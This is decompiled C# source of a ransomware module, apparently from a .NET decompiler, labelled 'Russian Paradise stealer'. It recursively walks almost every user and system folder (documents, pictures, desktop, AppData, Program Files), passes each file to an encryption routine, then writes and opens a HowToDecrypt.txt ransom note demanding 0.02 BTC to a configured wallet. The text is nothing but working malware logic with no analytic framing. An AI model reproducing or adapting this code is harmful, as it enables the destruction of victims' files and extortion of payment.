// Token: 0x06000192 RID: 402 RVA: 0x0000B804 File Offset: 0x00009A04
internal static void Start()
{
if (!File.Exists(Environment.GetEnvironmentVariable("ProgramData") + "\\trig"))
{
string[] array = new string[]
{
Environment.GetFolderPath(Environment.SpecialFolder.Recent),
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
Environment.GetFolderPath(Environment.SpecialFolder.MyPictures),
Environment.GetFolderPath(Environment.SpecialFolder.MyMusic),
Environment.GetFolderPath(Environment.SpecialFolder.MyVideos),
Environment.GetFolderPath(Environment.SpecialFolder.Personal),
Environment.GetFolderPath(Environment.SpecialFolder.Favorites),
Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments),
Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures),
Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic),
Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos),
Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory),
Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory),
Environment.GetFolderPath(Environment.SpecialFolder.Personal),
Environment.GetFolderPath(Environment.SpecialFolder.UserProfile),
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86),
Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)
};
for (int i = 0; i < array.Length; i++)
{
RansomwareCrypt.GetFile(array[i]);
}
}
File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt", string.Concat(new string[]
{
"IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer:",
crypt.AESDecript(Settings.Stealer_version),
"\nTo Decrypt: \n - Send 0.02 BTC to: ",
Settings.bitcoin_keshel,
"\n- Follow All Steps"
}), Encoding.UTF8);
Thread.Sleep(2000);
MessageBox.Show(string.Concat(new string[]
{
"IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer: ",
Settings.Stealer_version,
"\nTo Decrypt: \n - Send 0.02 BTC to: ",
Settings.bitcoin_keshel,
"\n - Follow All Steps"
}));
Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt");
}
// Token: 0x06000191 RID: 401 RVA: 0x0000B794 File Offset: 0x00009994
public static void GetFile(string string_1)
{
try
{
foreach (string text in Directory.GetFiles(string_1))
{
if (!Path.GetExtension(text).Contains("loki"))
{
RansomwareCrypt.EncryptFiles(text);
}
}
string[] array = Directory.GetDirectories(string_1);
for (int i = 0; i < array.Length; i++)
{
RansomwareCrypt.GetFile(array[i]);
}
}
catch (Exception)
{
}
}
